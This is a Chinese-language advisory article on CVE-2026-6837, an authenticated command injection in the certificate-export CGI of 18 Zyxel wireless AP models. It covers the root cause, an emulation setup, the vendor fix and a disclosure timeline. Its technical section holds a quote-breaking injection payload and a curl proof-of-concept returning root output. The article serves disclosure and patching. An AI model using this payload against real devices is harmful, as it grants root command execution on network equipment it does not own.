18 款 Zyxel 无线 AP 沦陷:一张证书导出图拿下一台设备 root

导语:Zyxel 多款无线 AP 设备再曝高危漏洞。安全研究人员发现 export-cgi 程序在处理 PKCS#12 证书导出时存在命令注入,已认证管理员可通过构造特制口令在设备上以 root 权限执行任意 OS 命令,CVSS 3.1 评分 7.2,共影响 18 款 AP 型号。


一、漏洞概述

漏洞标识

  • CVE 编号:CVE-2026-6837
  • CVSS 3.1 评分:7.2(高危)
  • CVSS 3.1 向量:AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • CWE:CWE-78(OS 命令注入)

漏洞描述

Zyxel 某些 AP 固件版本中的 export-cgi CGI 程序存在一处认证后命令注入漏洞。该漏洞源于证书导出功能中,设备使用用户提供的证书名称和导出口令构建 shell 命令并直接传递给 system() 执行。攻击者可通过在口令字段中插入双引号提前关闭预期字符串,其余输入内容作为 shell 语法被解析执行。

影响范围

参数
受影响产品Zyxel 无线 AP(共 18 款型号)
漏洞组件/cgi-bin/export-cgi
漏洞路径PKCS#12 证书导出
利用前提需要管理员会话权限
影响固件版本7.12(ABRM.0)C0 之前的版本

受影响型号

NWA50AX、NWA50AX PRO、NWA55AXE、NWA55AX PRO、NWA55AX PTP、NWA90AX、NWA90AX PRO、NWA110AX、NWA210AX、NWA220AX-6E、WAX300H、WAX510D、WAX610D、WAX620D-6E、WAX630S、WAX640S-6E、WAX650S、WAX655E


二、技术分析

漏洞根因

漏洞代码使用用户可控的证书名称(arg0)和导出口令(arg1)构造 shell 命令模板:

/bin/zysh -p 200 -e "configure terminal ca _export category local name %s password %s"

该命令直接传递给 system() 执行:

400dd0: bl snprintf(cmd_buf, 4096, format_string, arg0, arg1)
400dd8: bl unlink(tmp_path)
400de0: bl system(cmd_buf)

攻击原理

构造如下 Payload:

arg1 = x"; id; echo COMMAND_INJECTION_CONFIRMED; #

实际执行的命令被变形为:

/bin/zysh -p 200 -e "configure terminal ca _export ... password x"; id; echo COMMAND_INJECTION_CONFIRMED; #"

双引号被提前关闭后,后续内容作为独立 shell 命令执行,导致命令注入。

最小复现 PoC

curl -sk 
  -H 'Cookie: authtok=' 
  'https://[target]/cgi-bin/export-cgi?category=pkcs12&arg0=&arg1=x%22;id;echo%20COMMAND_INJECTION_CONFIRMED;#'

响应体(带内回显):

uid=0 gid=0(root) groups=0(root)
COMMAND_INJECTION_CONFIRMED
Status: 500 Internal Server Error !

命令输出在 HTTP 响应中直接返回。

限制条件

  • 目标设备需已存在可导出的证书对象(本地管理的证书存储中有证书条目)。
  • 这不是完全未配置设备的默认开启路径,而是证书管理正常工作流程中的一个分支。
  • 仅使用分号的 Payload 无法触发,必须使用引号截断方式。

三、实验环境与工具链

固件信息

参数
分析产品Zyxel WAX650S
固件版本V7.10(ABRM.4)C0
固件 SHA-256e0a93db912c0b7203e0eb899f07ddef99b62a82a27352477c0f85d761576b1e0

仿真实验环境

该漏洞路径完全通过仿真(rehosting)方式开发,未使用物理硬件。

固件提取

./emulation/extract_710ABRM4C0.sh ./firmware.bin ./710ABRM4C0_extracted

使用 dumpimagefdtgetubireader_extract_imagesunsquashfs 工具,将厂商 FIT 镜像分割、提取 root UBI 卷并解压 SquashFS 根文件系统。

运行环境准备

python3 ./emulation/prepare_zyxel_runroot.py 
  --src ./710ABRM4C0_extracted/rootfs 
  --dst ./runroot

将提取的固件规范化为可运行的 runroot,包含 Zyxel 运行时目录、符号链接和启动时占位文件。

启动仿真环境

./emulation/run_zyxel_lab.sh rebuild --phase core
./emulation/run_zyxel_lab.sh health --phase core

使用 qemu-aarch64-static 执行 Zyxel AArch64 用户空间,bwrap 提供 bind-mount 运行时视图。

播种 IPC 对象

python3 ./emulation/seed_zyxel_ipc.py up
python3 ./emulation/uam_unix_server.py 
  --socket ./runroot/dev/user-request 
  --log ./live_artifacts/uam-user-request.log

为 Web 栈所需的 SysV IPC 对象和伪造 UAM socket 播种。

触发漏洞路径

./emulation/run_admin_web_handler_focus.sh exportcgi_focus

重放管理员 Web 处理路径,直到在活动 HTTP seam 下触发 vulnerable export-cgi PKCS#12 分支。

使用的主要工具

工具用途
qemu-aarch64-static直接执行从固件提取的 Zyxel AArch64 用户空间
bubblewrap为 /proc、/sys、设备文件和仿真 socket 提供 bind-mount 运行时视图
curl驱动特制 HTTP 请求,从活动 CGI 路径捕获带内证明
Python 3 和 Bash驱动 runroot 准备、IPC 播种、运行时补丁和重放编排的辅助脚本
dumpimage、fdtget、ubireader_extract_images、unsquashfs将厂商镜像解压为可审查的根文件系统

四、修复建议

官方修复

Zyxel 已于 2026-08-04 发布安全公告,并发布修复版本 7.12(ABRM.0)C0(针对 WAX650S)。

修复方向

根本修复方案:停止从未受信任的证书导出输入构建 shell 命令

  • 将结构化参数传递到非 shell 执行路径是最干净的解决方案。
  • 如确实无法避免使用 shell,则必须强制实施真正的参数分离,而非引号字符串拼接。

升级路径

设备型号建议升级版本
WAX650S7.12(ABRM.0)C0 或更高
其他 17 款受影响 AP参阅 Zyxel 官方安全公告

⚠️ 升级风险提示

  • 固件升级可能造成设备短暂离线,建议在维护窗口期操作。
  • 升级前建议备份设备配置。
  • 升级后需验证各项功能正常运行。

五、时间线

日期事件
2026-04-07问题作为 WAX650S 原始报告的一部分提交给 Zyxel
2026-04-22Zyxel PSIRT 确认 CVE-2026-6837 已预留
2026-08-04Zyxel 发布安全公告,列出 18 款受影响 AP 型号

六、总结

CVE-2026-6837 是 Zyxel 多款无线 AP 设备中的认证后命令注入漏洞,CVSS 3.1 评分 7.2。攻击者需要获取管理员会话权限,但成功利用后可立即在设备上以 root 身份执行任意 OS 命令,对网络基础设施安全构成严重威胁。建议受影响用户尽快升级到厂商提供的修复版本。

版权声明:本文由华盟网原创发布,保留所有权利。

出处

  • 原文章:https://minanagehsalalma.github.io/CVE-2026-6837-zyxel-export-cgi-command-injection/?1
  • Zyxel 官方安全公告:https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-improper-authentication-vulnerabilities-in-certain-aps-fwa7-and-security-routers-08-04-2026
© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容